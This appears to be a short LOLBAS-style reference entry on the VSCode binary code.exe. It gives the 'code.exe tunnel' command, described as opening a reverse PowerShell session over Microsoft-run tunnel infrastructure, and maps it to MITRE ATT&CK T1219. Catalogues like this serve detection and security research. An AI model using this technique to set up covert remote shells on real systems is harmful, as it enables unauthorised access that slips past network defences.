.. /code.exe
Star

VSCode binary, also portable (CLI) version


Paths:

Resources:
Detection:

Execute

Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command
code.exe tunnel --accept-server-license-terms --name "tunnel-name"
Usecase: Reverse PowerShell session over MS provided infrastructure.
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1219